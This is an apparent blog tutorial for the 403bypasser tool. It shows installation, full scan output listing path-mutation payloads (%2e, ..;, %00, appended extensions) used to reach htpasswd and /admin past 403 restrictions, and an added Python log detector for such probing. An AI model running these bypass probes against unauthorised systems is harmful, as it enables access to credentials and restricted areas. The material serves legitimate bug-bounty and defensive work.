403bypasser – Bypass 403 Restrictions Directory

Hi guys, we have a fantastic tool for you all that can reward you if you are a bug hunter looking for bugs in a web application. 403bypasser automates techniques used to bypass access control restrictions on a landing page. In this tutorial, we will show you the installation and some uses of this tool.

Access control is a core component of data security that determines who can access and use company data and resources. The same technique is applied to web applications. Some websites are developed with strong security in mind. Even so, we can sometimes bypass this access control using automated tools.

The 403bypasser tool automates the techniques used to bypass access control restrictions on target pages. It brute-forces possible directories on the target domain to find those whose restrictions can be bypassed. 403bypasser is written in Python and is available on GitHub. It is open source and free to use. It supports scanning multiple URLs simultaneously, and the results can be saved to a text file for further use.

 

Installation:

Step_1: Use the following commands to install git and python3 and to clone the tool on your Kali Linux operating system.

sudo apt install git python3 -y
git clone https://github.com/yunemse48/403bypasser.git

 

┌──(root💀OnlineHacking)-[~]
└─# git clone https://github.com/yunemse48/403bypasser.git
Cloning into '403bypasser'...
remote: Enumerating objects: 217, done.
remote: Counting objects: 100% (27/27), done.
remote: Compressing objects: 100% (11/11), done.
remote: Total 217 (delta 21), reused 16 (delta 16), pack-reused 190
Receiving objects: 100% (217/217), 71.25 KiB | 694.00 KiB/s, done.
Resolving deltas: 100% (101/101), done.

┌──(root💀OnlineHacking)-[~]
└─# cd 403bypasser

┌──(root💀OnlineHacking)-[~/403bypasser]
└─# sudo pip3 install -r requirements.txt

 

Step_2: Now move into the tool directory using the following command. You need to be in this directory to run the tool.

cd 403bypasser

 

Step_3: You are now in the 403bypasser directory. Install the tool's dependencies using the following command.

sudo pip3 install -r requirements.txt

Step_4: All dependencies have been installed on your Kali Linux OS. Now run the tool with python3 and check the help section using the following command.

python3 403bypasser.py -h

 

┌──(root💀OnlineHacking)-[~/403bypasser]
└─# python3 403bypasser.py -h
                                                                                                                                                       
usage: 403bypasser.py [-h] [-u URL] [-U URLLIST] [-d [DIR]] [-D DIRLIST]

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     single URL to scan, ex: http://example.com
  -U URLLIST, --urllist URLLIST
                        path to list of URLs, ex: urllist.txt
  -d [DIR], --dir [DIR]
                        Single directory to scan, ex: /admin
  -D DIRLIST, --dirlist DIRLIST
                        path to list of directories, ex: dirlist.txt
                                                                                                                                                       

┌──(root💀OnlineHacking)-[~/403bypasser]
└─# 

 

 

💥 Using:

Sometimes we are not able to find the sensitive files of a web server with a direct request. In that case, the tool tries to find the given sensitive file by requesting it with different metacharacters added to the path.

python3 403bypasser.py -u http://192.168.1.9 -d htaccess

As you can see, it successfully found the sensitive file by adding an extension to the name.

This bad configuration can easily reward you because there are some juicy things in it.

 

You can try to access the sensitive file location by following the same procedure as in the previous step.

python3 403bypasser.py -u http://10.0.3.15 -d htpasswd
┌──(root💀OnlineHacking)-[~/403bypasser]
└─# python3 403bypasser.py -u http://10.0.3.15 -d htpasswd
 
 ______________________________________________________________________________
/_____/_____/_____/_____/_____/_____/_____/_____/_____/_____/_____/_____/_____/

    __ __ ____ _____ __ 
   / // / / __ \__ // /_ __ ______ ____ ______________ _____ ____
  / // /_/ / / //_ </ __ \/ / / / __ \/ __ `/ ___/ ___/ _ \/ ___/ 
 /__ __ / /_/ /__/ / /_/ / /_/ / /_/ / /_/ (__ |__ ) __/ /  / 
   /_/  \____/____/_.___/\__, / .___/\__,_/____/____/\___/_/ 
                        /____/_/ 

______________________________________________________________________________ 
/_____/_____/_____/_____/_____/_____/_____/_____/_____/_____/_____/_____/_____/ 

                                                                                                                                                       
=========== Target URL: http://10.0.3.15 Target Path: /htpasswd ===========

POST --> http://10.0.3.15/htpasswd                        STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd                         STATUS: 404 SIZE: 271
GET --> http://10.0.3.15//htpasswd//                      STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/./htpasswd/.                     STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/%2e/htpasswd                     STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd/                        STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd..;/                     STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd/..;/                    STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd%20                      STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd%09                      STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd%00                      STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd.json                    STATUS: 200 SIZE: 27
GET --> http://10.0.3.15/htpasswd.css                     STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd.html                    STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd?                        STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd??                       STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd???                      STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd?testparam               STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd#                        STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd#test                    STATUS: 404 SIZE: 271
GET --> http://10.0.3.15/htpasswd/.                       STATUS: 404 SIZE: 271
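
Seen from the server side, the output above is a single client asking for the same resource under many different spellings, which is straightforward to detect in access logs. The following Python code is an added example, not part of 403bypasser or of the original post: it canonicalizes each requested path and flags clients that request many variants of one resource. The log format, the names canonical and find_probing, the threshold and the sample log lines are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic). Client 10.0.3.4
# replays a few of the path variants listed in the tool output above.
SAMPLE_LOG = """\
10.0.3.4 - - [01/Jan/2024:10:00:00 +0000] "GET /htpasswd HTTP/1.1" 404 271
10.0.3.4 - - [01/Jan/2024:10:00:00 +0000] "GET //htpasswd// HTTP/1.1" 404 271
10.0.3.4 - - [01/Jan/2024:10:00:01 +0000] "GET /%2e/htpasswd HTTP/1.1" 404 271
10.0.3.4 - - [01/Jan/2024:10:00:01 +0000] "GET /htpasswd..;/ HTTP/1.1" 404 271
10.0.3.4 - - [01/Jan/2024:10:00:01 +0000] "GET /htpasswd%00 HTTP/1.1" 404 271
10.0.3.4 - - [01/Jan/2024:10:00:02 +0000] "GET /htpasswd.json HTTP/1.1" 200 27
10.0.3.7 - - [01/Jan/2024:10:05:00 +0000] "GET /index.html HTTP/1.1" 200 512
10.0.3.7 - - [01/Jan/2024:10:05:03 +0000] "GET /htpasswd HTTP/1.1" 404 271
"""

LINE_RE = re.compile(r'^(\S+) .*?"\w+ (\S+) HTTP/[\d.]+" (\d{3}) \d+')

def canonical(raw_path):
    """Undo the path mutations seen above so all variants map to one key."""
    path = unquote(raw_path.split("?", 1)[0].split("#", 1)[0])
    path = re.sub(r"[\x00-\x20]+$", "", path)            # %00 / %09 / %20 suffix
    segs = [s for s in path.split("/") if s not in ("", ".", "..;")]
    segs = [re.sub(r"\.\.;$", "", s) for s in segs]      # "htpasswd..;"
    if segs:                                             # appended extension
        segs[-1] = re.sub(r"\.(json|css|html)$", "", segs[-1])
    return "/" + "/".join(segs)

def find_probing(log_text, min_variants=4):
    """Flag clients that request one resource under many different spellings."""
    seen = defaultdict(dict)          # (client, canonical path) -> {raw: status}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            client, raw, status = m.groups()
            seen[(client, canonical(raw))][raw] = int(status)
    findings = []
    for (client, path), variants in seen.items():
        if len(variants) >= min_variants:
            # Variants that were actually served are the ones to review first.
            served = sorted(r for r, s in variants.items() if s < 400)
            findings.append({"client": client, "path": path,
                             "variants": len(variants), "served": served})
    return findings

if __name__ == "__main__":
    for f in find_probing(SAMPLE_LOG):
        print(f)
```

Any path listed under served is a spelling that the server answered while the plain path was refused or missing, so it points at the access rule that needs tightening.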

 

 

 

 

💢 Use 403bypasser Tool : 

Example_1: One URL to scan

python3 403bypasser.py -u http://192.168.1.110 -d htaccess

python3 403bypasser.py -u https://onlinehacking.org -d /admin

Example_2: Path to a list of URLs

python3 403bypasser.py -U list.txt -d /admin

 

Usage :

Argument | Description | Examples | Note
-u | single URL to scan | http://example.com or IP | All these example usages are interpreted in the same way
-U | path to list of URLs | ./urllist.txt, ../../urllist.txt, etc. | Just provide the path where the file is located 🙂
-d | single directory to scan | admin or /admin or admin/ or /admin/ | All these example usages are interpreted in the same way
-D | path to list of directories | ./dirlist.txt, ../../dirlist.txt, etc. | Just provide the path where the file is located 🙂

Usage_1: python3 403bypasser.py -u https://example.com -d /secret
Usage_2: python3 403bypasser.py -u https://example.com -D dirlist.txt
Usage_3: python3 403bypasser.py -U urllist.txt -d /secret
Usage_4: python3 403bypasser.py -U urllist.txt -D dirlist.txt

 

Suman

Hello, I'm SUMAN from India. I’m currently working on Cyber Ethical Hacking Penetration Testing & Bug Bounty. I’m currently learning more about Web Design, Android ROM